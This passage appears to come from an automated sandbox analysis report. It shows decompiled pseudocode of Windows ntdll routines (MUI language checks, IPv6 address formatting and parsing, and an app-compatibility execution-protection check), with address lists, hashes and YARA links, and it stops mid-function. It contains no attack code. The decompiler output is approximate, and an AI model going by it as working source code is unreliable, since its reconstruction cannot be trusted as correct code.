					_v48 = _t318;
					goto L58;
				} else {
					E01EC2340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E01EDE679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E01ECE2A8(_v12,  &_v68, _v16);
						if(E01EE5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E01EDE679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E01ECE2A8(_t322,  &_v68, _t296);
						if(E01EE5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E01ECE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E01ECE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                                              0x01ee8788
                                                              0x01ee8788
                                                              0x01ee8791
                                                              0x01ee8794
                                                              0x01ee8798
                                                              0x01ee879b
                                                              0x01ee879e
                                                              0x01ee87a1
                                                              0x01ee87a4
                                                              0x01ee87a7
                                                              0x01ee87aa
                                                              0x01ee87af
                                                              0x01f31ad3
                                                              0x01ee8b0a
                                                              0x01ee8b0d
                                                              0x01ee8b13
                                                              0x01ee8b19
                                                              0x01ee8b1f
                                                              0x01ee8b25
                                                              0x01ee8b2b
                                                              0x01ee8b31
                                                              0x01ee8b37
                                                              0x01ee8b3d
                                                              0x01ee8b46
                                                              0x01ee8b46
                                                              0x01ee87c6
                                                              0x01ee87d0
                                                              0x01f31ae0
                                                              0x01f31ae6
                                                              0x01f31af8
                                                              0x01f31af8
                                                              0x01f31afd
                                                              0x01f31afe
                                                              0x01f31b01
                                                              0x01f31b06
                                                              0x01f31b06
                                                              0x01ee87d6
                                                              0x01ee87f2
                                                              0x01ee87f7
                                                              0x01ee8807
                                                              0x01ee880a
                                                              0x01ee880f
                                                              0x01ee8810
                                                              0x01ee8813
                                                              0x01ee8818
                                                              0x01ee8818
                                                              0x01ee882c
                                                              0x01ee8831
                                                              0x01ee8838
                                                              0x01ee8908
                                                              0x01ee8920
                                                              0x01ee89f0
                                                              0x01ee8a08
                                                              0x01ee8af6
                                                              0x01ee8af6
                                                              0x01ee8af8
                                                              0x01ee8afb
                                                              0x01f31beb
                                                              0x01f31beb
                                                              0x01ee8b04
                                                              0x01f31bf8
                                                              0x01f31c0e
                                                              0x01f31c13
                                                              0x01f31c16
                                                              0x01f31c16
                                                              0x01f31bf8
                                                              0x00000000
                                                              0x01ee8b04
                                                              0x01ee8a0e
                                                              0x01ee8a11
                                                              0x01ee8a14
                                                              0x01ee8a15
                                                              0x01ee8a18
                                                              0x01ee8a22
                                                              0x01ee8b59
                                                              0x01ee8a28
                                                              0x01ee8a3c
                                                              0x01ee8a3c
                                                              0x01ee8a42
                                                              0x01f31bb0
                                                              0x01f31b11
                                                              0x01f31b11
                                                              0x00000000
                                                              0x01ee8a48
                                                              0x01ee8a51
                                                              0x01ee8a5b
                                                              0x01ee8a5e
                                                              0x01ee8a61
                                                              0x01ee8a69
                                                              0x01ee8a69
                                                              0x01ee8a6d
                                                              0x00000000
                                                              0x00000000
                                                              0x01ee8a74
                                                              0x01ee8a7c
                                                              0x01ee8a7d
                                                              0x01ee8a91
                                                              0x01ee8a93
                                                              0x01ee8a93
                                                              0x01ee8a98
                                                              0x01ee8a9b
                                                              0x01ee8aa1
                                                              0x01ee8aa1
                                                              0x01ee8aa4
                                                              0x01ee8aaa
                                                              0x01ee8ab1
                                                              0x01ee8ac5
                                                              0x01ee8ac7
                                                              0x01ee8ac7
                                                              0x01ee8ac5
                                                              0x01ee8ace
                                                              0x01f31bc9
                                                              0x01f31bce
                                                              0x01f31bd2
                                                              0x01f31bd2
                                                              0x01ee8ad8
                                                              0x01ee8aeb
                                                              0x01ee8aeb
                                                              0x01ee8af0
                                                              0x01ee8af4
                                                              0x00000000
                                                              0x01ee8af4
                                                              0x01ee8a42
                                                              0x01ee8926
                                                              0x01ee8929
                                                              0x01ee892c
                                                              0x01ee892d
                                                              0x01ee8930
                                                              0x01ee8935
                                                              0x01ee893a
                                                              0x01ee8b51
                                                              0x01ee8940
                                                              0x01ee8954
                                                              0x01ee8954
                                                              0x01ee895a
                                                              0x01f31b63
                                                              0x00000000
                                                              0x01ee8960
                                                              0x01ee8969
                                                              0x01ee8973
                                                              0x01ee8976
                                                              0x01ee8979
                                                              0x01ee897e
                                                              0x01ee8981
                                                              0x01ee8981
                                                              0x01ee8986
                                                              0x00000000
                                                              0x00000000
                                                              0x01f31b6e
                                                              0x01f31b74
                                                              0x01f31b7b
                                                              0x01f31b8f
                                                              0x01f31b91
                                                              0x01f31b91
                                                              0x01f31b99
                                                              0x01f31b9c
                                                              0x01f31ba2
                                                              0x01f31ba2
                                                              0x01ee898c
                                                              0x01ee8992
                                                              0x01ee8999
                                                              0x01ee89ad
                                                              0x01f31ba8
                                                              0x01f31ba8
                                                              0x01ee89ad
                                                              0x01ee89b6
                                                              0x01ee89c8
                                                              0x01ee89cd
                                                              0x01ee89d0
                                                              0x01ee89d0
                                                              0x01ee89d6
                                                              0x01ee89e8
                                                              0x01ee89e8
                                                              0x01ee89ed
                                                              0x00000000
                                                              0x01ee89ed
                                                              0x01ee895a
                                                              0x01ee883e
                                                              0x01ee8841
                                                              0x01ee8844
                                                              0x01ee8845
                                                              0x01ee8848
                                                              0x01ee884d
                                                              0x01ee8852
                                                              0x01ee8b49
                                                              0x01ee8858
                                                              0x01ee886c
                                                              0x01ee886c
                                                              0x01ee8872
                                                              0x01f31b0e
                                                              0x00000000
                                                              0x01ee8878
                                                              0x01ee8881
                                                              0x01ee888b
                                                              0x01ee888e
                                                              0x01ee8891
                                                              0x01ee8896
                                                              0x01ee8899
                                                              0x01ee8899
                                                              0x01ee889e
                                                              0x00000000
                                                              0x00000000
                                                              0x01f31b21
                                                              0x01f31b27
                                                              0x01f31b2e
                                                              0x01f31b42
                                                              0x01f31b44
                                                              0x01f31b44
                                                              0x01f31b4c
                                                              0x01f31b4f
                                                              0x01f31b55
                                                              0x01f31b55
                                                              0x01ee88a4
                                                              0x01ee88aa
                                                              0x01ee88b1
                                                              0x01ee88c5
                                                              0x01f31b5b
                                                              0x01f31b5b
                                                              0x01ee88c5
                                                              0x01ee88ce
                                                              0x01ee88e0
                                                              0x01ee88e5
                                                              0x01ee88e8
                                                              0x01ee88e8
                                                              0x01ee88ee
                                                              0x01ee8900
                                                              0x01ee8900
                                                              0x01ee8905
                                                              0x00000000
                                                              0x01ee8905

                                                              APIs
                                                              Strings
                                                              • WindowsExcludedProcs, xrefs: 01EE87C1
                                                              • Kernel-MUI-Language-Disallowed, xrefs: 01EE8914
                                                              • Kernel-MUI-Language-Allowed, xrefs: 01EE8827
                                                              • Kernel-MUI-Number-Allowed, xrefs: 01EE87E6
                                                              • Kernel-MUI-Language-SKU, xrefs: 01EE89FC
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.665945266.0000000001EB0000.00000040.00000001.sdmp, Offset: 01EA0000, based on PE: true
                                                              • Associated: 00000006.00000002.665938551.0000000001EA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666041714.0000000001F90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666052467.0000000001FA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666063534.0000000001FA4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666081748.0000000001FA7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666114112.0000000001FB0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666168843.0000000002010000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: _wcspbrk
                                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                              • API String ID: 402402107-258546922
                                                              • Opcode ID: f9df061cff09e6457bff6635363db199dab5fd49739ef507b24befd364c60947
                                                              • Instruction ID: a0f5be6b28e85195b8e95d3d624f143d5c3c81755f82805808aaedcedd336ae4
                                                              • Opcode Fuzzy Hash: f9df061cff09e6457bff6635363db199dab5fd49739ef507b24befd364c60947
                                                              • Instruction Fuzzy Hash: 74F1F4B2D0024AEFDF11DF98C984DEEBBF9FB08704F14546AE605A7210E7359A45DBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01F013CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 38%
                                                              			E01F013CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E01EF7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x1ec2926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E01EF7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x1ec9cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E01EF7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E01EF7707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E01EF7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E01EF7707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                              0x01f013d5
                                                              0x01f013d9
                                                              0x01f013dc
                                                              0x01f013de
                                                              0x01f013e1
                                                              0x01f013e8
                                                              0x01f013ee
                                                              0x01f2e8fd
                                                              0x00000000
                                                              0x01f2e921
                                                              0x01f2e921
                                                              0x01f2e928
                                                              0x01f2e982
                                                              0x01f2e98a
                                                              0x00000000
                                                              0x01f2e99a
                                                              0x01f2e99e
                                                              0x01f2e9a3
                                                              0x01f2e9a8
                                                              0x01f2e9b9
                                                              0x01f2e978
                                                              0x00000000
                                                              0x01f2e978
                                                              0x01f2e98a
                                                              0x01f2e92a
                                                              0x01f2e931
                                                              0x01f2e944
                                                              0x01f2e944
                                                              0x01f2e950
                                                              0x01f2e954
                                                              0x01f2e959
                                                              0x01f2e95e
                                                              0x01f2e963
                                                              0x01f2e970
                                                              0x00000000
                                                              0x01f2e975
                                                              0x01f2e93b
                                                              0x01f2e980
                                                              0x00000000
                                                              0x01f2e980
                                                              0x01f2e942
                                                              0x01f2e94b
                                                              0x00000000
                                                              0x01f2e94b
                                                              0x00000000
                                                              0x01f2e942
                                                              0x01f013f4
                                                              0x01f013f4
                                                              0x01f013f9
                                                              0x01f013fc
                                                              0x01f013ff
                                                              0x01f01406
                                                              0x01f2e9cc
                                                              0x01f2e9d2
                                                              0x01f2e9d2
                                                              0x01f2e9cc
                                                              0x01f0140c
                                                              0x01f01411
                                                              0x01f01431
                                                              0x01f0143a
                                                              0x01f0143c
                                                              0x01f0143f
                                                              0x01f0143f
                                                              0x01f01442
                                                              0x01f01447
                                                              0x01f014a8
                                                              0x01f014ac
                                                              0x01f2e9e2
                                                              0x01f2e9e7
                                                              0x01f2e9ec
                                                              0x01f2ea05
                                                              0x01f2ea05
                                                              0x00000000
                                                              0x01f01449
                                                              0x00000000
                                                              0x01f01449
                                                              0x01f0144c
                                                              0x01f01459
                                                              0x01f01462
                                                              0x01f01469
                                                              0x01f0146a
                                                              0x01f01470
                                                              0x01f01473
                                                              0x01f01476
                                                              0x01f01476
                                                              0x01f01490
                                                              0x01f01495
                                                              0x01f0138e
                                                              0x01f01390
                                                              0x01f01397
                                                              0x01f01398
                                                              0x01f01399
                                                              0x01f013a1
                                                              0x01f013a4
                                                              0x01f013a4
                                                              0x01f01498
                                                              0x01f0149c
                                                              0x01f0149f
                                                              0x01f014a2
                                                              0x00000000
                                                              0x00000000
                                                              0x01f014a4
                                                              0x00000000
                                                              0x01f014a4
                                                              0x01f01413
                                                              0x01f01415
                                                              0x01f01416
                                                              0x01f01419
                                                              0x01f0141c
                                                              0x01f01422
                                                              0x01f013b7
                                                              0x01f013bc
                                                              0x01f013bf
                                                              0x01f013bf
                                                              0x01f013c2
                                                              0x01f01424
                                                              0x01f01424
                                                              0x01f01424
                                                              0x01f01427
                                                              0x01f0142b
                                                              0x01f0142c
                                                              0x01f0142c
                                                              0x01f0142c
                                                              0x00000000
                                                              0x01f0141c
                                                              0x01f01411

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.665945266.0000000001EB0000.00000040.00000001.sdmp, Offset: 01EA0000, based on PE: true
                                                              • Associated: 00000006.00000002.665938551.0000000001EA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666041714.0000000001F90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666052467.0000000001FA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666063534.0000000001FA4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666081748.0000000001FA7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666114112.0000000001FB0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666168843.0000000002010000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: ___swprintf_l
                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                              • API String ID: 48624451-2108815105
                                                              • Opcode ID: 1bd56f2a8915a6c0f3d38d24c1f859b6df06a8e5771b2520189ff8c78651fd65
                                                              • Instruction ID: 61b7411cf61414cc3c42ddff9974cb23f3aa1c35eb7363f0c02afab93d02142d
                                                              • Opcode Fuzzy Hash: 1bd56f2a8915a6c0f3d38d24c1f859b6df06a8e5771b2520189ff8c78651fd65
                                                              • Instruction Fuzzy Hash: AF6135B5E04656EACB36CF5DC8808BFBBB5EF95300754C12EE59647581D332E640DBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01EF7EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 64%
                                                              			E01EF7EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x1fa2088; // 0x745fb394
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E01EF7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E01F13F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E01ECDFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x1fa4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E01F13F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E01ED0D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E01F13F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E01ED8375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E01F13F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E01F3E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E01F13F92();
					_t38 = 1;
					L2:
					return E01ECE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                              0x01ef7f08
                                                              0x01ef7f0f
                                                              0x01ef7f12
                                                              0x01ef7f1b
                                                              0x01ef7f31
                                                              0x01f13ead
                                                              0x01f13eb4
                                                              0x00000000
                                                              0x00000000
                                                              0x01f13eba
                                                              0x01f13ecd
                                                              0x01f13ed2
                                                              0x01f13ee1
                                                              0x01f13ee7
                                                              0x01f13eec
                                                              0x01f13f12
                                                              0x01f13f18
                                                              0x01f13f1a
                                                              0x00000000
                                                              0x00000000
                                                              0x01f13f20
                                                              0x01f13f26
                                                              0x01f13f28
                                                              0x00000000
                                                              0x00000000
                                                              0x01f13f2e
                                                              0x01f13f30
                                                              0x00000000
                                                              0x00000000
                                                              0x01f13f3a
                                                              0x01f13f3b
                                                              0x01f13f53
                                                              0x01f13f64
                                                              0x01f13f69
                                                              0x01f13f6c
                                                              0x01f13f6d
                                                              0x01f13f6f
                                                              0x01f1e304
                                                              0x01f1e30f
                                                              0x01f1e315
                                                              0x01f1e31e
                                                              0x01f1e321
                                                              0x01f1e327
                                                              0x01f1e329
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x01f1e32f
                                                              0x01f1e32f
                                                              0x01f1e337
                                                              0x01f1e33a
                                                              0x01f1e33b
                                                              0x01f1e33d
                                                              0x01f1e33f
                                                              0x01f1e341
                                                              0x01f1e341
                                                              0x01f1e34e
                                                              0x01f1e353
                                                              0x01f1e358
                                                              0x01f1e35d
                                                              0x01f1e35f
                                                              0x00000000
                                                              0x00000000
                                                              0x01f1e365
                                                              0x01f1e365
                                                              0x01f1e368
                                                              0x01f1e36e
                                                              0x00000000
                                                              0x00000000
                                                              0x01f1e374
                                                              0x01f1e32f
                                                              0x01f13f75
                                                              0x01f13f7a
                                                              0x01f13f7c
                                                              0x01f13f7e
                                                              0x01f13f86
                                                              0x01ef7f39
                                                              0x01ef7f47
                                                              0x01ef7f47
                                                              0x01ef7f37
                                                              0x01ef7f37
                                                              0x00000000

                                                              APIs
                                                              • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 01F13F12
                                                              Strings
                                                              • ExecuteOptions, xrefs: 01F13F04
                                                              • Execute=1, xrefs: 01F13F5E
                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01F1E2FB
                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01F13F4A
                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01F13F75
                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01F13EC4
                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 01F1E345
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.665945266.0000000001EB0000.00000040.00000001.sdmp, Offset: 01EA0000, based on PE: true
                                                              • Associated: 00000006.00000002.665938551.0000000001EA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666041714.0000000001F90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666052467.0000000001FA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666063534.0000000001FA4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666081748.0000000001FA7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666114112.0000000001FB0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666168843.0000000002010000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: BaseDataModuleQuery
                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                              • API String ID: 3901378454-484625025
                                                              • Opcode ID: f688e9acb393f81aac045ee9a080af5e188bfab7a16106c505028d149dcd6945
                                                              • Instruction ID: 8cf29383c0016d5f6cf89aaaeb7ed0af7e7e1a9562aba9427ceedf9b849bbbe6
                                                              • Opcode Fuzzy Hash: f688e9acb393f81aac045ee9a080af5e188bfab7a16106c505028d149dcd6945
                                                              • Instruction Fuzzy Hash: CB41D972A4030D7ADB219B94DCC5FDF73BCAF58700F0404ADBB05E6085E7719A868BA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01F00B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E01F00B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E01ED8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E01ECDFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E01F00CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E01F00CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E01F006BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E01F006BA(_t135, _t178) == 0 || E01F00A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E01F00CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E01F00CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
